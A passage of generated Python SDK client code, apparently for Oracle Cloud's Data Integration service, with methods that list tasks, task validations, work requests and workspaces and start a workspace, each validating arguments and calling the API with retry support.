if 'sort_order' in kwargs:
sort_order_allowed_values = ["ASC", "DESC"]
if kwargs['sort_order'] not in sort_order_allowed_values:
raise ValueError(
"Invalid value for `sort_order`, must be one of {0}".format(sort_order_allowed_values)
)
query_params = {
"key": self.base_client.generate_collection_format_param(kwargs.get("key", missing), 'multi'),
"name": kwargs.get("name", missing),
"identifier": self.base_client.generate_collection_format_param(kwargs.get("identifier", missing), 'multi'),
"type": self.base_client.generate_collection_format_param(kwargs.get("type", missing), 'multi'),
"page": kwargs.get("page", missing),
"limit": kwargs.get("limit", missing),
"sortBy": kwargs.get("sort_by", missing),
"sortOrder": kwargs.get("sort_order", missing),
"isEnabled": kwargs.get("is_enabled", missing)
}
query_params = {k: v for (k, v) in six.iteritems(query_params) if v is not missing and v is not None}
header_params = {
"accept": "application/json",
"content-type": "application/json",
"opc-request-id": kwargs.get("opc_request_id", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.retry_strategy
if kwargs.get('retry_strategy'):
retry_strategy = kwargs.get('retry_strategy')
if retry_strategy:
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
query_params=query_params,
header_params=header_params,
response_type="TaskScheduleSummaryCollection")
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
query_params=query_params,
header_params=header_params,
response_type="TaskScheduleSummaryCollection")
def list_task_validations(self, workspace_id, **kwargs):
"""
Retrieves a list of task validations within the specified workspace.
:param str workspace_id: (required)
The workspace ID.
:param str key: (optional)
Used to filter by the key of the object.
:param str name: (optional)
Used to filter by the name of the object.
:param str identifier: (optional)
Used to filter by the identifier of the object.
:param list[str] fields: (optional)
Specifies the fields to get for an object.
:param str page: (optional)
For list pagination. The value for this parameter is the `opc-next-page` or the `opc-prev-page` response header from the previous `List` call. See `List Pagination`__.
__ https://docs.cloud.oracle.com/iaas/Content/API/Concepts/usingapi.htm#nine
:param int limit: (optional)
Sets the maximum number of results per page, or items to return in a paginated `List` call. See `List Pagination`__.
__ https://docs.cloud.oracle.com/iaas/Content/API/Concepts/usingapi.htm#nine
:param str sort_by: (optional)
Specifies the field to sort by. Accepts only one field. By default, when you sort by time fields, results are shown in descending order. All other fields default to ascending order. Sorting related parameters are ignored when parameter `query` is present (search operation and sorting order is by relevance score in descending order).
Allowed values are: "TIME_CREATED", "DISPLAY_NAME"
:param str sort_order: (optional)
Specifies sort order to use, either `ASC` (ascending) or `DESC` (descending).
Allowed values are: "ASC", "DESC"
:param str opc_request_id: (optional)
Unique Oracle-assigned identifier for the request. If
you need to contact Oracle about a particular request,
please provide the request ID.
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. A convenience :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY`
is also available. The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:return: A :class:`~oci.response.Response` object with data of type :class:`~oci.data_integration.models.TaskValidationSummaryCollection`
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/dataintegration/list_task_validations.py.html>`__ to see an example of how to use list_task_validations API.
"""
resource_path = "/workspaces/{workspaceId}/taskValidations"
method = "GET"
# Don't accept unknown kwargs
expected_kwargs = [
"retry_strategy",
"key",
"name",
"identifier",
"fields",
"page",
"limit",
"sort_by",
"sort_order",
"opc_request_id"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"list_task_validations got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"workspaceId": workspace_id
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
if 'sort_by' in kwargs:
sort_by_allowed_values = ["TIME_CREATED", "DISPLAY_NAME"]
if kwargs['sort_by'] not in sort_by_allowed_values:
raise ValueError(
"Invalid value for `sort_by`, must be one of {0}".format(sort_by_allowed_values)
)
if 'sort_order' in kwargs:
sort_order_allowed_values = ["ASC", "DESC"]
if kwargs['sort_order'] not in sort_order_allowed_values:
raise ValueError(
"Invalid value for `sort_order`, must be one of {0}".format(sort_order_allowed_values)
)
query_params = {
"key": kwargs.get("key", missing),
"name": kwargs.get("name", missing),
"identifier": kwargs.get("identifier", missing),
"fields": self.base_client.generate_collection_format_param(kwargs.get("fields", missing), 'multi'),
"page": kwargs.get("page", missing),
"limit": kwargs.get("limit", missing),
"sortBy": kwargs.get("sort_by", missing),
"sortOrder": kwargs.get("sort_order", missing)
}
query_params = {k: v for (k, v) in six.iteritems(query_params) if v is not missing and v is not None}
header_params = {
"accept": "application/json",
"content-type": "application/json",
"opc-request-id": kwargs.get("opc_request_id", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.retry_strategy
if kwargs.get('retry_strategy'):
retry_strategy = kwargs.get('retry_strategy')
if retry_strategy:
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
query_params=query_params,
header_params=header_params,
response_type="TaskValidationSummaryCollection")
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
query_params=query_params,
header_params=header_params,
response_type="TaskValidationSummaryCollection")
def list_tasks(self, workspace_id, **kwargs):
"""
Retrieves a list of all tasks in a specified project or folder.
:param str workspace_id: (required)
The workspace ID.
:param str opc_request_id: (optional)
Unique Oracle-assigned identifier for the request. If
you need to contact Oracle about a particular request,
please provide the request ID.
:param str folder_id: (optional)
Unique key of the folder.
:param list[str] fields: (optional)
Specifies the fields to get for an object.
:param str name: (optional)
Used to filter by the name of the object.
:param list[str] key: (optional)
Used to filter by the key of the object.
:param list[str] identifier: (optional)
Used to filter by the identifier of the object.
:param list[str] type: (optional)
Used to filter by the object type of the object. It can be suffixed with an optional filter operator InSubtree. If this operator is not specified, then exact match is considered. <br><br><B>Examples:</B><br> <ul> <li><B>?type=DATA_LOADER_TASK&typeInSubtree=false</B> returns all objects of type data loader task</li> <li><B>?type=DATA_LOADER_TASK</B> returns all objects of type data loader task</li> <li><B>?type=DATA_LOADER_TASK&typeInSubtree=true</B> returns all objects of type data loader task</li> </ul>
:param int limit: (optional)
Sets the maximum number of results per page, or items to return in a paginated `List` call. See `List Pagination`__.
__ https://docs.cloud.oracle.com/iaas/Content/API/Concepts/usingapi.htm#nine
:param str page: (optional)
For list pagination. The value for this parameter is the `opc-next-page` or the `opc-prev-page` response header from the previous `List` call. See `List Pagination`__.
__ https://docs.cloud.oracle.com/iaas/Content/API/Concepts/usingapi.htm#nine
:param str sort_order: (optional)
Specifies sort order to use, either `ASC` (ascending) or `DESC` (descending).
Allowed values are: "ASC", "DESC"
:param str sort_by: (optional)
Specifies the field to sort by. Accepts only one field. By default, when you sort by time fields, results are shown in descending order. All other fields default to ascending order. Sorting related parameters are ignored when parameter `query` is present (search operation and sorting order is by relevance score in descending order).
Allowed values are: "TIME_CREATED", "DISPLAY_NAME"
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. A convenience :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY`
is also available. The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:return: A :class:`~oci.response.Response` object with data of type :class:`~oci.data_integration.models.TaskSummaryCollection`
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/dataintegration/list_tasks.py.html>`__ to see an example of how to use list_tasks API.
"""
resource_path = "/workspaces/{workspaceId}/tasks"
method = "GET"
# Don't accept unknown kwargs
expected_kwargs = [
"retry_strategy",
"opc_request_id",
"folder_id",
"fields",
"name",
"key",
"identifier",
"type",
"limit",
"page",
"sort_order",
"sort_by"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"list_tasks got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"workspaceId": workspace_id
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
if 'sort_order' in kwargs:
sort_order_allowed_values = ["ASC", "DESC"]
if kwargs['sort_order'] not in sort_order_allowed_values:
raise ValueError(
"Invalid value for `sort_order`, must be one of {0}".format(sort_order_allowed_values)
)
if 'sort_by' in kwargs:
sort_by_allowed_values = ["TIME_CREATED", "DISPLAY_NAME"]
if kwargs['sort_by'] not in sort_by_allowed_values:
raise ValueError(
"Invalid value for `sort_by`, must be one of {0}".format(sort_by_allowed_values)
)
query_params = {
"folderId": kwargs.get("folder_id", missing),
"fields": self.base_client.generate_collection_format_param(kwargs.get("fields", missing), 'multi'),
"name": kwargs.get("name", missing),
"key": self.base_client.generate_collection_format_param(kwargs.get("key", missing), 'multi'),
"identifier": self.base_client.generate_collection_format_param(kwargs.get("identifier", missing), 'multi'),
"type": self.base_client.generate_collection_format_param(kwargs.get("type", missing), 'multi'),
"limit": kwargs.get("limit", missing),
"page": kwargs.get("page", missing),
"sortOrder": kwargs.get("sort_order", missing),
"sortBy": kwargs.get("sort_by", missing)
}
query_params = {k: v for (k, v) in six.iteritems(query_params) if v is not missing and v is not None}
header_params = {
"accept": "application/json",
"content-type": "application/json",
"opc-request-id": kwargs.get("opc_request_id", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.retry_strategy
if kwargs.get('retry_strategy'):
retry_strategy = kwargs.get('retry_strategy')
if retry_strategy:
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
query_params=query_params,
header_params=header_params,
response_type="TaskSummaryCollection")
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
query_params=query_params,
header_params=header_params,
response_type="TaskSummaryCollection")
def list_work_request_errors(self, work_request_id, **kwargs):
"""
Retrieves a paginated list of errors for a given work request.
:param str work_request_id: (required)
The ID of the asynchronous work request to retrieve.
:param str opc_request_id: (optional)
Unique Oracle-assigned identifier for the request. If
you need to contact Oracle about a particular request,
please provide the request ID.
:param str page: (optional)
For list pagination. The value for this parameter is the `opc-next-page` or the `opc-prev-page` response header from the previous `List` call. See `List Pagination`__.
__ https://docs.cloud.oracle.com/iaas/Content/API/Concepts/usingapi.htm#nine
:param int limit: (optional)
Sets the maximum number of results per page, or items to return in a paginated `List` call. See `List Pagination`__.
__ https://docs.cloud.oracle.com/iaas/Content/API/Concepts/usingapi.htm#nine
:param str sort_order: (optional)
Specifies sort order to use, either `ASC` (ascending) or `DESC` (descending).
Allowed values are: "ASC", "DESC"
:param str sort_by: (optional)
Specifies the field to sort by. Accepts only one field. By default, when you sort by time fields, results are shown in descending order. All other fields default to ascending order. Sorting related parameters are ignored when parameter `query` is present (search operation and sorting order is by relevance score in descending order).
Allowed values are: "TIME_CREATED", "DISPLAY_NAME"
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. A convenience :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY`
is also available. The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:return: A :class:`~oci.response.Response` object with data of type list of :class:`~oci.data_integration.models.WorkRequestError`
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/dataintegration/list_work_request_errors.py.html>`__ to see an example of how to use list_work_request_errors API.
"""
resource_path = "/workRequests/{workRequestId}/workRequestErrors"
method = "GET"
# Don't accept unknown kwargs
expected_kwargs = [
"retry_strategy",
"opc_request_id",
"page",
"limit",
"sort_order",
"sort_by"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"list_work_request_errors got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"workRequestId": work_request_id
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
if 'sort_order' in kwargs:
sort_order_allowed_values = ["ASC", "DESC"]
if kwargs['sort_order'] not in sort_order_allowed_values:
raise ValueError(
"Invalid value for `sort_order`, must be one of {0}".format(sort_order_allowed_values)
)
if 'sort_by' in kwargs:
sort_by_allowed_values = ["TIME_CREATED", "DISPLAY_NAME"]
if kwargs['sort_by'] not in sort_by_allowed_values:
raise ValueError(
"Invalid value for `sort_by`, must be one of {0}".format(sort_by_allowed_values)
)
query_params = {
"page": kwargs.get("page", missing),
"limit": kwargs.get("limit", missing),
"sortOrder": kwargs.get("sort_order", missing),
"sortBy": kwargs.get("sort_by", missing)
}
query_params = {k: v for (k, v) in six.iteritems(query_params) if v is not missing and v is not None}
header_params = {
"accept": "application/json",
"content-type": "application/json",
"opc-request-id": kwargs.get("opc_request_id", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.retry_strategy
if kwargs.get('retry_strategy'):
retry_strategy = kwargs.get('retry_strategy')
if retry_strategy:
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
query_params=query_params,
header_params=header_params,
response_type="list[WorkRequestError]")
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
query_params=query_params,
header_params=header_params,
response_type="list[WorkRequestError]")
def list_work_request_logs(self, work_request_id, **kwargs):
"""
Retrieves a paginated list of logs for a given work request.
:param str work_request_id: (required)
The ID of the asynchronous work request to retrieve.
:param str opc_request_id: (optional)
Unique Oracle-assigned identifier for the request. If
you need to contact Oracle about a particular request,
please provide the request ID.
:param str page: (optional)
For list pagination. The value for this parameter is the `opc-next-page` or the `opc-prev-page` response header from the previous `List` call. See `List Pagination`__.
__ https://docs.cloud.oracle.com/iaas/Content/API/Concepts/usingapi.htm#nine
:param int limit: (optional)
Sets the maximum number of results per page, or items to return in a paginated `List` call. See `List Pagination`__.
__ https://docs.cloud.oracle.com/iaas/Content/API/Concepts/usingapi.htm#nine
:param str sort_order: (optional)
Specifies sort order to use, either `ASC` (ascending) or `DESC` (descending).
Allowed values are: "ASC", "DESC"
:param str sort_by: (optional)
Specifies the field to sort by. Accepts only one field. By default, when you sort by time fields, results are shown in descending order. All other fields default to ascending order. Sorting related parameters are ignored when parameter `query` is present (search operation and sorting order is by relevance score in descending order).
Allowed values are: "TIME_CREATED", "DISPLAY_NAME"
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. A convenience :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY`
is also available. The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:return: A :class:`~oci.response.Response` object with data of type list of :class:`~oci.data_integration.models.WorkRequestLogEntry`
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/dataintegration/list_work_request_logs.py.html>`__ to see an example of how to use list_work_request_logs API.
"""
resource_path = "/workRequests/{workRequestId}/logs"
method = "GET"
# Don't accept unknown kwargs
expected_kwargs = [
"retry_strategy",
"opc_request_id",
"page",
"limit",
"sort_order",
"sort_by"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"list_work_request_logs got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"workRequestId": work_request_id
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
if 'sort_order' in kwargs:
sort_order_allowed_values = ["ASC", "DESC"]
if kwargs['sort_order'] not in sort_order_allowed_values:
raise ValueError(
"Invalid value for `sort_order`, must be one of {0}".format(sort_order_allowed_values)
)
if 'sort_by' in kwargs:
sort_by_allowed_values = ["TIME_CREATED", "DISPLAY_NAME"]
if kwargs['sort_by'] not in sort_by_allowed_values:
raise ValueError(
"Invalid value for `sort_by`, must be one of {0}".format(sort_by_allowed_values)
)
query_params = {
"page": kwargs.get("page", missing),
"limit": kwargs.get("limit", missing),
"sortOrder": kwargs.get("sort_order", missing),
"sortBy": kwargs.get("sort_by", missing)
}
query_params = {k: v for (k, v) in six.iteritems(query_params) if v is not missing and v is not None}
header_params = {
"accept": "application/json",
"content-type": "application/json",
"opc-request-id": kwargs.get("opc_request_id", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.retry_strategy
if kwargs.get('retry_strategy'):
retry_strategy = kwargs.get('retry_strategy')
if retry_strategy:
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
query_params=query_params,
header_params=header_params,
response_type="list[WorkRequestLogEntry]")
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
query_params=query_params,
header_params=header_params,
response_type="list[WorkRequestLogEntry]")
def list_work_requests(self, compartment_id, **kwargs):
"""
Lists the work requests in a compartment.
:param str compartment_id: (required)
The OCID of the compartment containing the resources you want to list.
:param str opc_request_id: (optional)
Unique Oracle-assigned identifier for the request. If
you need to contact Oracle about a particular request,
please provide the request ID.
:param str workspace_id: (optional)
DIS workspace id
:param str work_request_status: (optional)
The work request status.
Allowed values are: "ACCEPTED", "IN_PROGRESS", "FAILED", "SUCCEEDED", "CANCELING", "CANCELED"
:param str page: (optional)
For list pagination. The value for this parameter is the `opc-next-page` or the `opc-prev-page` response header from the previous `List` call. See `List Pagination`__.
__ https://docs.cloud.oracle.com/iaas/Content/API/Concepts/usingapi.htm#nine
:param int limit: (optional)
Sets the maximum number of results per page, or items to return in a paginated `List` call. See `List Pagination`__.
__ https://docs.cloud.oracle.com/iaas/Content/API/Concepts/usingapi.htm#nine
:param str sort_order: (optional)
Specifies sort order to use, either `ASC` (ascending) or `DESC` (descending).
Allowed values are: "ASC", "DESC"
:param str sort_by: (optional)
Specifies the field to sort by. Accepts only one field. By default, when you sort by time fields, results are shown in descending order. All other fields default to ascending order. Sorting related parameters are ignored when parameter `query` is present (search operation and sorting order is by relevance score in descending order).
Allowed values are: "TIME_CREATED", "DISPLAY_NAME"
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. A convenience :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY`
is also available. The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:return: A :class:`~oci.response.Response` object with data of type list of :class:`~oci.data_integration.models.WorkRequestSummary`
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/dataintegration/list_work_requests.py.html>`__ to see an example of how to use list_work_requests API.
"""
resource_path = "/workRequests"
method = "GET"
# Don't accept unknown kwargs
expected_kwargs = [
"retry_strategy",
"opc_request_id",
"workspace_id",
"work_request_status",
"page",
"limit",
"sort_order",
"sort_by"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"list_work_requests got unknown kwargs: {!r}".format(extra_kwargs))
if 'work_request_status' in kwargs:
work_request_status_allowed_values = ["ACCEPTED", "IN_PROGRESS", "FAILED", "SUCCEEDED", "CANCELING", "CANCELED"]
if kwargs['work_request_status'] not in work_request_status_allowed_values:
raise ValueError(
"Invalid value for `work_request_status`, must be one of {0}".format(work_request_status_allowed_values)
)
if 'sort_order' in kwargs:
sort_order_allowed_values = ["ASC", "DESC"]
if kwargs['sort_order'] not in sort_order_allowed_values:
raise ValueError(
"Invalid value for `sort_order`, must be one of {0}".format(sort_order_allowed_values)
)
if 'sort_by' in kwargs:
sort_by_allowed_values = ["TIME_CREATED", "DISPLAY_NAME"]
if kwargs['sort_by'] not in sort_by_allowed_values:
raise ValueError(
"Invalid value for `sort_by`, must be one of {0}".format(sort_by_allowed_values)
)
query_params = {
"compartmentId": compartment_id,
"workspaceId": kwargs.get("workspace_id", missing),
"workRequestStatus": kwargs.get("work_request_status", missing),
"page": kwargs.get("page", missing),
"limit": kwargs.get("limit", missing),
"sortOrder": kwargs.get("sort_order", missing),
"sortBy": kwargs.get("sort_by", missing)
}
query_params = {k: v for (k, v) in six.iteritems(query_params) if v is not missing and v is not None}
header_params = {
"accept": "application/json",
"content-type": "application/json",
"opc-request-id": kwargs.get("opc_request_id", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.retry_strategy
if kwargs.get('retry_strategy'):
retry_strategy = kwargs.get('retry_strategy')
if retry_strategy:
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
query_params=query_params,
header_params=header_params,
response_type="list[WorkRequestSummary]")
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
query_params=query_params,
header_params=header_params,
response_type="list[WorkRequestSummary]")
def list_workspaces(self, compartment_id, **kwargs):
"""
Retrieves a list of Data Integration workspaces.
:param str compartment_id: (required)
The OCID of the compartment containing the resources you want to list.
:param str name: (optional)
Used to filter by the name of the object.
:param int limit: (optional)
Sets the maximum number of results per page, or items to return in a paginated `List` call. See `List Pagination`__.
__ https://docs.cloud.oracle.com/iaas/Content/API/Concepts/usingapi.htm#nine
:param str page: (optional)
For list pagination. The value for this parameter is the `opc-next-page` or the `opc-prev-page` response header from the previous `List` call. See `List Pagination`__.
__ https://docs.cloud.oracle.com/iaas/Content/API/Concepts/usingapi.htm#nine
:param str lifecycle_state: (optional)
The lifecycle state of a resource. When specified, the operation only returns resources that match the given lifecycle state. When not specified, all lifecycle states are processed as a match.
Allowed values are: "CREATING", "ACTIVE", "INACTIVE", "UPDATING", "DELETING", "DELETED", "FAILED", "STARTING", "STOPPING", "STOPPED"
:param str sort_order: (optional)
Specifies sort order to use, either `ASC` (ascending) or `DESC` (descending).
Allowed values are: "ASC", "DESC"
:param str sort_by: (optional)
Specifies the field to sort by. Accepts only one field. By default, when you sort by time fields, results are shown in descending order. All other fields default to ascending order. Sorting related parameters are ignored when parameter `query` is present (search operation and sorting order is by relevance score in descending order).
Allowed values are: "TIME_CREATED", "DISPLAY_NAME"
:param str opc_request_id: (optional)
Unique Oracle-assigned identifier for the request. If
you need to contact Oracle about a particular request,
please provide the request ID.
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. A convenience :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY`
is also available. The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:return: A :class:`~oci.response.Response` object with data of type list of :class:`~oci.data_integration.models.WorkspaceSummary`
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/dataintegration/list_workspaces.py.html>`__ to see an example of how to use list_workspaces API.
"""
resource_path = "/workspaces"
method = "GET"
# Don't accept unknown kwargs
expected_kwargs = [
"retry_strategy",
"name",
"limit",
"page",
"lifecycle_state",
"sort_order",
"sort_by",
"opc_request_id"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"list_workspaces got unknown kwargs: {!r}".format(extra_kwargs))
if 'lifecycle_state' in kwargs:
lifecycle_state_allowed_values = ["CREATING", "ACTIVE", "INACTIVE", "UPDATING", "DELETING", "DELETED", "FAILED", "STARTING", "STOPPING", "STOPPED"]
if kwargs['lifecycle_state'] not in lifecycle_state_allowed_values:
raise ValueError(
"Invalid value for `lifecycle_state`, must be one of {0}".format(lifecycle_state_allowed_values)
)
if 'sort_order' in kwargs:
sort_order_allowed_values = ["ASC", "DESC"]
if kwargs['sort_order'] not in sort_order_allowed_values:
raise ValueError(
"Invalid value for `sort_order`, must be one of {0}".format(sort_order_allowed_values)
)
if 'sort_by' in kwargs:
sort_by_allowed_values = ["TIME_CREATED", "DISPLAY_NAME"]
if kwargs['sort_by'] not in sort_by_allowed_values:
raise ValueError(
"Invalid value for `sort_by`, must be one of {0}".format(sort_by_allowed_values)
)
query_params = {
"compartmentId": compartment_id,
"name": kwargs.get("name", missing),
"limit": kwargs.get("limit", missing),
"page": kwargs.get("page", missing),
"lifecycleState": kwargs.get("lifecycle_state", missing),
"sortOrder": kwargs.get("sort_order", missing),
"sortBy": kwargs.get("sort_by", missing)
}
query_params = {k: v for (k, v) in six.iteritems(query_params) if v is not missing and v is not None}
header_params = {
"accept": "application/json",
"content-type": "application/json",
"opc-request-id": kwargs.get("opc_request_id", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.retry_strategy
if kwargs.get('retry_strategy'):
retry_strategy = kwargs.get('retry_strategy')
if retry_strategy:
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
query_params=query_params,
header_params=header_params,
response_type="list[WorkspaceSummary]")
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
query_params=query_params,
header_params=header_params,
response_type="list[WorkspaceSummary]")
def start_workspace(self, workspace_id, **kwargs):
"""
Starts a workspace.
:param str workspace_id: (required)
The workspace ID.
:param str if_match: (optional)
For optimistic concurrency control. In the PUT or DELETE call for a resource, set the `if-match` parameter to the value of the `etag` from a previous GET or POST response for that resource.
The resource will be updated or deleted only if the `etag` you provide matches the resource's current `etag` value.
When 'if-match' is provided and its value does not exactly match the 'etag' of the resource on the server, the request fails with the 412 response code.
:param str opc_request_id: (optional)
Unique Oracle-assigned identifier for the request. If
you need to contact Oracle about a particular request,
please provide the request ID.
:param str opc_retry_token: (optional)
A token that uniquely identifies a request so it can be retried in case of a timeout or server error without risk of executing that same action again.
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. A convenience :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY`
is also available. The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:return: A :class:`~oci.response.Response` object with data of type None
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/dataintegration/start_workspace.py.html>`__ to see an example of how to use start_workspace API.
"""
resource_path = "/workspaces/{workspaceId}/actions/start"
method = "POST"
# Don't accept unknown kwargs
expected_kwargs = [
"retry_strategy",
"if_match",
"opc_request_id",
"opc_retry_token"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"start_workspace got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"workspaceId": workspace_id
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
header_params = {
"accept": "application/json",
"content-type": "application/json",
"if-match": kwargs.get("if_match", missing),
"opc-request-id": kwargs.get("opc_request_id", missing),
"opc-retry-token": kwargs.get("opc_retry_token", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.retry_strategy
if kwargs.get('retry_strategy'):
retry_strategy = kwargs.get('retry_strategy')
if retry_strategy:
if not isinstance(retry_strategy, retry.NoneRetryStrategy):
self.base_client.add_opc_retry_token_if_needed(header_params)
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params)
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params)
def stop_workspace(self, workspace_id, **kwargs):
"""
Stops a workspace.
:param str workspace_id: (required)
The workspace ID.
:param int quiesce_timeout: (optional)
